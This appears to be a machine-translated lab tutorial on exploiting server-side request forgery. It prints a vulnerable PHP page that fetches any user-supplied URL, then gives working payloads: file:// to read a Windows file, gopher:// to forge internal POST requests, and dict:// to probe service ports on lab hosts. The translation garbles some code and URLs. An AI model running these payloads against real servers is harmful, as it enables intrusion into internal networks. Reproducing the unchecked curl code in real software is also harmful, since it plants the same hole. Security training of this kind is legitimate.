SSRF-- exploits (b)

0x01 Overview

The first part describes the general usage of SSRF, to use http network detection, network within striking redis, the following discussion is to expand the usage of SSRF through, file, dict, gopher protocol to use SSRF vulnerability.

0x02 experimental environment

Attacker: 192.168.220.140

SSRF vulnerability exists drone: 192.168.220.143

Attack within the network ip: 192.168.220.144

 

SSRF vulnerability exists in the page: http: //192.168.220.143: 8888 / zhan / ssrf / ssrf_demo.php, code is as follows:

? < PHP
 // create a new cURL resource 
$ CH = curl_init ();
 // set URL and the appropriate option 
curl_setopt ( $ CH , CURLOPT_URL, $ _GET [ 'url' ]); 
curl_setopt ( $ CH , CURLOPT_HEADER, false ) ;
 // grab URL and pass it to the browser 
curl_exec ( $ CH );
 // close cURL resource, and free up system resources 
curl_close ( $ CH );
 ?>

[1] by using the file protocol to read the file

Visit: http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=file:///C:/WINDOWS/win.ini, successfully read the file

 

[2] to use the intranet system by POST attack gopher protocol

Suppose there is a network system (http://192.168.220.144/bWAPP/post.php), which support the POST request, as follows:

<html>
<head>
    <title>post</title>
</head>
<body>
    <?php
    echo $_REQUEST[cmd];
    ?>
</body>
</html>

 

By curl command [] and [] gopher protocol can initiate a request for a post http://192.168.220.144/bWAPP/post.php, for example, directly execute the following command:

curl 'gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=aaaaaaaa'

 

View 192.168.220.144 system log will find more than a record of the request from POST 192.168.220.142

 

 

By SSRF gopher protocol vulnerability can also use the intranet system POST request, but first need to look at [phpinfo] to confirm curl is enabled, curl version 7.38.0 here is, (7.21.0 begin with, there is no reproduction success, here's a pit! - If the version is too low, increase phpstudy in the php version can provoke ^^ linux, then updates directly under)

 

 

Then you can access through URL:

http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=qqq

192.168.220.144 go see the system log will find more than a POST 192.168.220.143 request from the record:

 

 

Ethereal can be seen through, in fact, 192.168.220.143 did send a POST request to 192.168.220.144, where 143 actually acted as a springboard machine.

 

 

Attack process is as follows:

 

 

[3] read using the service version running on the target server port information through the dict protocol

 Visit: http: //192.168.220.143:? 8888 / zhan / ssrf / ssrf_demo.php url = dict: //192.168.220.143: 3306

 

 

Or visit, http: //192.168.220.143:? 8888 / zhan / ssrf / ssrf_demo.php url = dict: //192.168.220.144: 80